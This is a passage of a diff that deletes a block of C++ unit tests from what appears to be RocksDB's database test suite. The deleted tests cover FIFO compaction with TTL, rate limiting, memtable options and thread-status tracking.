-  options.create_if_missing = true;
-  options.compaction_options_fifo.ttl = 600;  // seconds
-
-  // Check that it is not supported with max_open_files != -1.
-  options.max_open_files = 100;
-  options = CurrentOptions(options);
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-
-  options.max_open_files = -1;
-  ASSERT_OK(TryReopen(options));
-}
-
-// Check that FIFO-with-TTL is supported only with BlockBasedTableFactory.
-TEST_F(DBTest, FIFOCompactionWithTTLAndVariousTableFormatsTest) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.create_if_missing = true;
-  options.compaction_options_fifo.ttl = 600;  // seconds
-
-  options = CurrentOptions(options);
-  options.table_factory.reset(NewBlockBasedTableFactory());
-  ASSERT_OK(TryReopen(options));
-
-  Destroy(options);
-  options.table_factory.reset(NewPlainTableFactory());
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-
-  Destroy(options);
-  options.table_factory.reset(NewCuckooTableFactory());
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-
-  Destroy(options);
-  options.table_factory.reset(NewAdaptiveTableFactory());
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-}
-
-TEST_F(DBTest, FIFOCompactionWithTTLTest) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.write_buffer_size = 10 << 10;  // 10KB
-  options.arena_block_size = 4096;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  env_->time_elapse_only_sleep_ = false;
-  options.env = env_;
-
-  // Test to make sure that all files with expired ttl are deleted on next
-  // manual compaction.
-  {
-    env_->addon_time_.store(0);
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = false;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60 ;  // 1 hour
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 10; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    // Note: Couldn't use SleepForMicroseconds because it takes an int instead
-    // of uint64_t. Hence used addon_time_ directly.
-    // env_->SleepForMicroseconds(2 * 60 * 60 * 1000 * 1000);
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-
-    // Since no flushes and compactions have run, the db should still be in
-    // the same state even after considerable time has passed.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  }
-
-  // Test to make sure that all files with expired ttl are deleted on next
-  // automatic compaction.
-  {
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = false;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60;  // 1 hour
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 10; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-    // Just to make sure that we are in the same state even after sleeping.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    // Create 1 more file to trigger TTL compaction. The old files are dropped.
-    for (int i = 0; i < 1; i++) {
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-    }
-
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    // Only the new 10 files remain.
-    ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-
-  // Test that shows the fall back to size-based FIFO compaction if TTL-based
-  // deletion doesn't move the total size to be less than max_table_files_size.
-  {
-    options.write_buffer_size = 10 << 10;                              // 10KB
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = false;
-    options.compaction_options_fifo.ttl =  1 * 60 * 60;  // 1 hour
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 3; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 3);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-    // Just to make sure that we are in the same state even after sleeping.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 3);
-
-    for (int i = 0; i < 5; i++) {
-      for (int j = 0; j < 140; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    // Size limit is still guaranteed.
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-
-  // Test with TTL + Intra-L0 compactions.
-  {
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = true;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60;  // 1 hour
-    options.level0_file_num_compaction_trigger = 6;
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 10; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    // With Intra-L0 compaction, out of 10 files, 6 files will be compacted to 1
-    // (due to level0_file_num_compaction_trigger = 6).
-    // So total files = 1 + remaining 4 = 5.
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-    // Just to make sure that we are in the same state even after sleeping.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-
-    // Create 10 more files. The old 5 files are dropped as their ttl expired.
-    for (int i = 0; i < 10; i++) {
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-
-  // Test with large TTL + Intra-L0 compactions.
-  // Files dropped based on size, as ttl doesn't kick in.
-  {
-    options.write_buffer_size = 20 << 10;                               // 20K
-    options.compaction_options_fifo.max_table_files_size = 1500 << 10;  // 1.5MB
-    options.compaction_options_fifo.allow_compaction = true;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60;  // 1 hour
-    options.level0_file_num_compaction_trigger = 6;
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 60; i++) {
-      // Generate and flush a file about 20KB.
-      for (int j = 0; j < 20; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    // It should be compacted to 10 files.
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    for (int i = 0; i < 60; i++) {
-      // Generate and flush a file about 20KB.
-      for (int j = 0; j < 20; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j + 2000), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-
-    // It should be compacted to no more than 20 files.
-    ASSERT_GT(NumTableFilesAtLevel(0), 10);
-    ASSERT_LT(NumTableFilesAtLevel(0), 18);
-    // Size limit is still guaranteed.
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-/*
- * This test is not reliable enough as it heavily depends on disk behavior.
- * Disable as it is flaky.
- */
-TEST_F(DBTest, DISABLED_RateLimitingTest) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 1 << 20;  // 1MB
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = 1 << 20;     // 1MB
-  options.max_bytes_for_level_base = 4 << 20;  // 4MB
-  options.max_bytes_for_level_multiplier = 4;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options.env = env_;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.IncreaseParallelism(4);
-  DestroyAndReopen(options);
-
-  WriteOptions wo;
-  wo.disableWAL = true;
-
-  // # no rate limiting
-  Random rnd(301);
-  uint64_t start = env_->NowMicros();
-  // Write ~96M data
-  for (int64_t i = 0; i < (96 << 10); ++i) {
-    ASSERT_OK(
-        Put(RandomString(&rnd, 32), RandomString(&rnd, (1 << 10) + 1), wo));
-  }
-  uint64_t elapsed = env_->NowMicros() - start;
-  double raw_rate = env_->bytes_written_ * 1000000.0 / elapsed;
-  uint64_t rate_limiter_drains =
-      TestGetTickerCount(options, NUMBER_RATE_LIMITER_DRAINS);
-  ASSERT_EQ(0, rate_limiter_drains);
-  Close();
-
-  // # rate limiting with 0.7 x threshold
-  options.rate_limiter.reset(
-      NewGenericRateLimiter(static_cast<int64_t>(0.7 * raw_rate)));
-  env_->bytes_written_ = 0;
-  DestroyAndReopen(options);
-
-  start = env_->NowMicros();
-  // Write ~96M data
-  for (int64_t i = 0; i < (96 << 10); ++i) {
-    ASSERT_OK(
-        Put(RandomString(&rnd, 32), RandomString(&rnd, (1 << 10) + 1), wo));
-  }
-  rate_limiter_drains =
-      TestGetTickerCount(options, NUMBER_RATE_LIMITER_DRAINS) -
-      rate_limiter_drains;
-  elapsed = env_->NowMicros() - start;
-  Close();
-  ASSERT_EQ(options.rate_limiter->GetTotalBytesThrough(), env_->bytes_written_);
-  // Most intervals should've been drained (interval time is 100ms, elapsed is
-  // micros)
-  ASSERT_GT(rate_limiter_drains, 0);
-  ASSERT_LE(rate_limiter_drains, elapsed / 100000 + 1);
-  double ratio = env_->bytes_written_ * 1000000 / elapsed / raw_rate;
-  fprintf(stderr, "write rate ratio = %.2lf, expected 0.7\n", ratio);
-  ASSERT_TRUE(ratio < 0.8);
-
-  // # rate limiting with half of the raw_rate
-  options.rate_limiter.reset(
-      NewGenericRateLimiter(static_cast<int64_t>(raw_rate / 2)));
-  env_->bytes_written_ = 0;
-  DestroyAndReopen(options);
-
-  start = env_->NowMicros();
-  // Write ~96M data
-  for (int64_t i = 0; i < (96 << 10); ++i) {
-    ASSERT_OK(
-        Put(RandomString(&rnd, 32), RandomString(&rnd, (1 << 10) + 1), wo));
-  }
-  elapsed = env_->NowMicros() - start;
-  rate_limiter_drains =
-      TestGetTickerCount(options, NUMBER_RATE_LIMITER_DRAINS) -
-      rate_limiter_drains;
-  Close();
-  ASSERT_EQ(options.rate_limiter->GetTotalBytesThrough(), env_->bytes_written_);
-  // Most intervals should've been drained (interval time is 100ms, elapsed is
-  // micros)
-  ASSERT_GT(rate_limiter_drains, elapsed / 100000 / 2);
-  ASSERT_LE(rate_limiter_drains, elapsed / 100000 + 1);
-  ratio = env_->bytes_written_ * 1000000 / elapsed / raw_rate;
-  fprintf(stderr, "write rate ratio = %.2lf, expected 0.5\n", ratio);
-  ASSERT_LT(ratio, 0.6);
-}
-
-TEST_F(DBTest, TableOptionsSanitizeTest) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  ASSERT_EQ(db_->GetOptions().allow_mmap_reads, false);
-
-  options.table_factory.reset(new PlainTableFactory());
-  options.prefix_extractor.reset(NewNoopTransform());
-  Destroy(options);
-  ASSERT_TRUE(!TryReopen(options).IsNotSupported());
-
-  // Test for check of prefix_extractor when hash index is used for
-  // block-based table
-  BlockBasedTableOptions to;
-  to.index_type = BlockBasedTableOptions::kHashSearch;
-  options = CurrentOptions();
-  options.create_if_missing = true;
-  options.table_factory.reset(NewBlockBasedTableFactory(to));
-  ASSERT_TRUE(TryReopen(options).IsInvalidArgument());
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-  ASSERT_OK(TryReopen(options));
-}
-
-TEST_F(DBTest, ConcurrentMemtableNotSupported) {
-  Options options = CurrentOptions();
-  options.allow_concurrent_memtable_write = true;
-  options.soft_pending_compaction_bytes_limit = 0;
-  options.hard_pending_compaction_bytes_limit = 100;
-  options.create_if_missing = true;
-
-  DestroyDB(dbname_, options);
-  options.memtable_factory.reset(NewHashLinkListRepFactory(4, 0, 3, true, 4));
-  ASSERT_NOK(TryReopen(options));
-
-  options.memtable_factory.reset(new SkipListFactory);
-  ASSERT_OK(TryReopen(options));
-
-  ColumnFamilyOptions cf_options(options);
-  cf_options.memtable_factory.reset(
-      NewHashLinkListRepFactory(4, 0, 3, true, 4));
-  ColumnFamilyHandle* handle;
-  ASSERT_NOK(db_->CreateColumnFamily(cf_options, "name", &handle));
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, SanitizeNumThreads) {
-  for (int attempt = 0; attempt < 2; attempt++) {
-    const size_t kTotalTasks = 8;
-    test::SleepingBackgroundTask sleeping_tasks[kTotalTasks];
-
-    Options options = CurrentOptions();
-    if (attempt == 0) {
-      options.max_background_compactions = 3;
-      options.max_background_flushes = 2;
-    }
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-
-    for (size_t i = 0; i < kTotalTasks; i++) {
-      // Insert 5 tasks to low priority queue and 5 tasks to high priority queue
-      env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                     &sleeping_tasks[i],
-                     (i < 4) ? Env::Priority::LOW : Env::Priority::HIGH);
-    }
-
-    // Wait 100 milliseconds for they are scheduled.
-    env_->SleepForMicroseconds(100000);
-
-    // pool size 3, total task 4. Queue size should be 1.
-    ASSERT_EQ(1U, options.env->GetThreadPoolQueueLen(Env::Priority::LOW));
-    // pool size 2, total task 4. Queue size should be 2.
-    ASSERT_EQ(2U, options.env->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-    for (size_t i = 0; i < kTotalTasks; i++) {
-      sleeping_tasks[i].WakeUp();
-      sleeping_tasks[i].WaitUntilDone();
-    }
-
-    ASSERT_OK(Put("abc", "def"));
-    ASSERT_EQ("def", Get("abc"));
-    Flush();
-    ASSERT_EQ("def", Get("abc"));
-  }
-}
-
-TEST_F(DBTest, WriteSingleThreadEntry) {
-  std::vector<port::Thread> threads;
-  dbfull()->TEST_LockMutex();
-  auto w = dbfull()->TEST_BeginWrite();
-  threads.emplace_back([&] { Put("a", "b"); });
-  env_->SleepForMicroseconds(10000);
-  threads.emplace_back([&] { Flush(); });
-  env_->SleepForMicroseconds(10000);
-  dbfull()->TEST_UnlockMutex();
-  dbfull()->TEST_LockMutex();
-  dbfull()->TEST_EndWrite(w);
-  dbfull()->TEST_UnlockMutex();
-
-  for (auto& t : threads) {
-    t.join();
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, DynamicMemtableOptions) {
-  const uint64_t k64KB = 1 << 16;
-  const uint64_t k128KB = 1 << 17;
-  const uint64_t k5KB = 5 * 1024;
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.compression = kNoCompression;
-  options.max_background_compactions = 1;
-  options.write_buffer_size = k64KB;
-  options.arena_block_size = 16 * 1024;
-  options.max_write_buffer_number = 2;
-  // Don't trigger compact/slowdown/stop
-  options.level0_file_num_compaction_trigger = 1024;
-  options.level0_slowdown_writes_trigger = 1024;
-  options.level0_stop_writes_trigger = 1024;
-  DestroyAndReopen(options);
-
-  auto gen_l0_kb = [this](int size) {
-    const int kNumPutsBeforeWaitForFlush = 64;
-    Random rnd(301);
-    for (int i = 0; i < size; i++) {
-      ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-
-      // The following condition prevents a race condition between flush jobs
-      // acquiring work and this thread filling up multiple memtables. Without
-      // this, the flush might produce less files than expected because
-      // multiple memtables are flushed into a single L0 file. This race
-      // condition affects assertion (A).
-      if (i % kNumPutsBeforeWaitForFlush == kNumPutsBeforeWaitForFlush - 1) {
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-  };
-
-  // Test write_buffer_size
-  gen_l0_kb(64);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-  ASSERT_LT(SizeAtLevel(0), k64KB + k5KB);
-  ASSERT_GT(SizeAtLevel(0), k64KB - k5KB * 2);
-
-  // Clean up L0
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  // Increase buffer size
-  ASSERT_OK(dbfull()->SetOptions({
-      {"write_buffer_size", "131072"},
-  }));
-
-  // The existing memtable inflated 64KB->128KB when we invoked SetOptions().
-  // Write 192KB, we should have a 128KB L0 file and a memtable with 64KB data.
-  gen_l0_kb(192);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);  // (A)
-  ASSERT_LT(SizeAtLevel(0), k128KB + 2 * k5KB);
-  ASSERT_GT(SizeAtLevel(0), k128KB - 4 * k5KB);
-
-  // Decrease buffer size below current usage
-  ASSERT_OK(dbfull()->SetOptions({
-      {"write_buffer_size", "65536"},
-  }));
-  // The existing memtable became eligible for flush when we reduced its
-  // capacity to 64KB. Two keys need to be added to trigger flush: first causes
-  // memtable to be marked full, second schedules the flush. Then we should have
-  // a 128KB L0 file, a 64KB L0 file, and a memtable with just one key.
-  gen_l0_kb(2);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-  ASSERT_LT(SizeAtLevel(0), k128KB + k64KB + 2 * k5KB);
-  ASSERT_GT(SizeAtLevel(0), k128KB + k64KB - 4 * k5KB);
-
-  // Test max_write_buffer_number
-  // Block compaction thread, which will also block the flushes because
-  // max_background_flushes == 0, so flushes are getting executed by the
-  // compaction thread
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  // Start from scratch and disable compaction/flush. Flush can only happen
-  // during compaction but trigger is pretty high
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  env_->SetBackgroundThreads(0, Env::HIGH);
-
-  // Put until writes are stopped, bounded by 256 puts. We should see stop at
-  // ~128KB
-  int count = 0;
-  Random rnd(301);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::DelayWrite:Wait",
-      [&](void* arg) { sleeping_task_low.WakeUp(); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  while (!sleeping_task_low.WokenUp() && count < 256) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), WriteOptions()));
-    count++;
-  }
-  ASSERT_GT(static_cast<double>(count), 128 * 0.8);
-  ASSERT_LT(static_cast<double>(count), 128 * 1.2);
-
-  sleeping_task_low.WaitUntilDone();
-
-  // Increase
-  ASSERT_OK(dbfull()->SetOptions({
-      {"max_write_buffer_number", "8"},
-  }));
-  // Clean up memtable and L0
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  sleeping_task_low.Reset();
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  count = 0;
-  while (!sleeping_task_low.WokenUp() && count < 1024) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), WriteOptions()));
-    count++;
-  }
-// Windows fails this test. Will tune in the future and figure out
-// approp number
-#ifndef OS_WIN
-  ASSERT_GT(static_cast<double>(count), 512 * 0.8);
-  ASSERT_LT(static_cast<double>(count), 512 * 1.2);
-#endif
-  sleeping_task_low.WaitUntilDone();
-
-  // Decrease
-  ASSERT_OK(dbfull()->SetOptions({
-      {"max_write_buffer_number", "4"},
-  }));
-  // Clean up memtable and L0
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  sleeping_task_low.Reset();
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  count = 0;
-  while (!sleeping_task_low.WokenUp() && count < 1024) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), WriteOptions()));
-    count++;
-  }
-// Windows fails this test. Will tune in the future and figure out
-// approp number
-#ifndef OS_WIN
-  ASSERT_GT(static_cast<double>(count), 256 * 0.8);
-  ASSERT_LT(static_cast<double>(count), 266 * 1.2);
-#endif
-  sleeping_task_low.WaitUntilDone();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-#endif  // ROCKSDB_LITE
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-namespace {
-void VerifyOperationCount(Env* env, ThreadStatus::OperationType op_type,
-                          int expected_count) {
-  int op_count = 0;
-  std::vector<ThreadStatus> thread_list;
-  ASSERT_OK(env->GetThreadList(&thread_list));
-  for (auto thread : thread_list) {
-    if (thread.operation_type == op_type) {
-      op_count++;
-    }
-  }
-  ASSERT_EQ(op_count, expected_count);
-}
-}  // namespace
-
-TEST_F(DBTest, GetThreadStatus) {
-  Options options;
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  TryReopen(options);
-
-  std::vector<ThreadStatus> thread_list;
-  Status s = env_->GetThreadList(&thread_list);
-
-  for (int i = 0; i < 2; ++i) {
-    // repeat the test with differet number of high / low priority threads
-    const int kTestCount = 3;
-    const unsigned int kHighPriCounts[kTestCount] = {3, 2, 5};
-    const unsigned int kLowPriCounts[kTestCount] = {10, 15, 3};
-    for (int test = 0; test < kTestCount; ++test) {
-      // Change the number of threads in high / low priority pool.
-      env_->SetBackgroundThreads(kHighPriCounts[test], Env::HIGH);
-      env_->SetBackgroundThreads(kLowPriCounts[test], Env::LOW);
-      // Wait to ensure the all threads has been registered
-      unsigned int thread_type_counts[ThreadStatus::NUM_THREAD_TYPES];
-      // Try up to 60 seconds.
-      for (int num_try = 0; num_try < 60000; num_try++) {
-        env_->SleepForMicroseconds(1000);
-        thread_list.clear();
-        s = env_->GetThreadList(&thread_list);
-        ASSERT_OK(s);
-        memset(thread_type_counts, 0, sizeof(thread_type_counts));
-        for (auto thread : thread_list) {
-          ASSERT_LT(thread.thread_type, ThreadStatus::NUM_THREAD_TYPES);
-          thread_type_counts[thread.thread_type]++;
-        }
-        if (thread_type_counts[ThreadStatus::HIGH_PRIORITY] ==
-                kHighPriCounts[test] &&
-            thread_type_counts[ThreadStatus::LOW_PRIORITY] ==
-                kLowPriCounts[test]) {
-          break;
-        }
-      }
-      // Verify the total number of threades
-      ASSERT_EQ(thread_type_counts[ThreadStatus::HIGH_PRIORITY] +
-                    thread_type_counts[ThreadStatus::LOW_PRIORITY],
-                kHighPriCounts[test] + kLowPriCounts[test]);
-      // Verify the number of high-priority threads
-      ASSERT_EQ(thread_type_counts[ThreadStatus::HIGH_PRIORITY],
-                kHighPriCounts[test]);
-      // Verify the number of low-priority threads
-      ASSERT_EQ(thread_type_counts[ThreadStatus::LOW_PRIORITY],
-                kLowPriCounts[test]);
-    }
-    if (i == 0) {
-      // repeat the test with multiple column families
-      CreateAndReopenWithCF({"pikachu", "about-to-remove"}, options);
-      env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                     true);
-    }
-  }
-  db_->DropColumnFamily(handles_[2]);
-  delete handles_[2];
-  handles_.erase(handles_.begin() + 2);
-  env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                 true);
-  Close();
-  env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                 true);
-}
-
-TEST_F(DBTest, DisableThreadStatus) {
-  Options options;
-  options.env = env_;
-  options.enable_thread_tracking = false;
-  TryReopen(options);
-  CreateAndReopenWithCF({"pikachu", "about-to-remove"}, options);
-  // Verify non of the column family info exists
-  env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                 false);
-}
-
-TEST_F(DBTest, ThreadStatusFlush) {
-  Options options;
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.enable_thread_tracking = true;
-  options = CurrentOptions(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"FlushJob::FlushJob()", "DBTest::ThreadStatusFlush:1"},
-      {"DBTest::ThreadStatusFlush:2", "FlushJob::WriteLevel0Table"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-  VerifyOperationCount(env_, ThreadStatus::OP_FLUSH, 0);
-
-  ASSERT_OK(Put(1, "foo", "v1"));
-  ASSERT_EQ("v1", Get(1, "foo"));
-  VerifyOperationCount(env_, ThreadStatus::OP_FLUSH, 0);
-
-  uint64_t num_running_flushes = 0;
-  db_->GetIntProperty(DB::Properties::kNumRunningFlushes, &num_running_flushes);
-  ASSERT_EQ(num_running_flushes, 0);
-
-  Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-  Put(1, "k2", std::string(100000, 'y'));  // Trigger flush
-
-  // The first sync point is to make sure there's one flush job
-  // running when we perform VerifyOperationCount().
-  TEST_SYNC_POINT("DBTest::ThreadStatusFlush:1");
-  VerifyOperationCount(env_, ThreadStatus::OP_FLUSH, 1);
-  db_->GetIntProperty(DB::Properties::kNumRunningFlushes, &num_running_flushes);
-  ASSERT_EQ(num_running_flushes, 1);
-  // This second sync point is to ensure the flush job will not
-  // be completed until we already perform VerifyOperationCount().
-  TEST_SYNC_POINT("DBTest::ThreadStatusFlush:2");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBTestWithParam, ThreadStatusSingleCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 100;
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base = options.target_file_size_base * 2;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  const int kNumL0Files = 4;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.max_subcompactions = max_subcompactions_;
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBTest::ThreadStatusSingleCompaction:0", "DBImpl::BGWorkCompaction"},
-      {"CompactionJob::Run():Start", "DBTest::ThreadStatusSingleCompaction:1"},
-      {"DBTest::ThreadStatusSingleCompaction:2", "CompactionJob::Run():End"},
-  });
-  for (int tests = 0; tests < 2; ++tests) {
-    DestroyAndReopen(options);
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    Random rnd(301);
-    // The Put Phase.
-    for (int file = 0; file < kNumL0Files; ++file) {
-      for (int key = 0; key < kEntriesPerBuffer; ++key) {
-        ASSERT_OK(Put(ToString(key + file * kEntriesPerBuffer),
-                      RandomString(&rnd, kTestValueSize)));
-      }
-      Flush();
-    }
-    // This makes sure a compaction won't be scheduled until
-    // we have done with the above Put Phase.
-    uint64_t num_running_compactions = 0;
-    db_->GetIntProperty(DB::Properties::kNumRunningCompactions,
-                        &num_running_compactions);
-    ASSERT_EQ(num_running_compactions, 0);
-    TEST_SYNC_POINT("DBTest::ThreadStatusSingleCompaction:0");
-    ASSERT_GE(NumTableFilesAtLevel(0),
-              options.level0_file_num_compaction_trigger);
-
-    // This makes sure at least one compaction is running.
-    TEST_SYNC_POINT("DBTest::ThreadStatusSingleCompaction:1");
-
-    if (options.enable_thread_tracking) {
-      // expecting one single L0 to L1 compaction
-      VerifyOperationCount(env_, ThreadStatus::OP_COMPACTION, 1);
-    } else {
-      // If thread tracking is not enabled, compaction count should be 0.
-      VerifyOperationCount(env_, ThreadStatus::OP_COMPACTION, 0);
-    }
-    db_->GetIntProperty(DB::Properties::kNumRunningCompactions,
-                        &num_running_compactions);
-    ASSERT_EQ(num_running_compactions, 1);
-    // TODO(yhchiang): adding assert to verify each compaction stage.
-    TEST_SYNC_POINT("DBTest::ThreadStatusSingleCompaction:2");
-
-    // repeat the test with disabling thread tracking.
-    options.enable_thread_tracking = false;
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
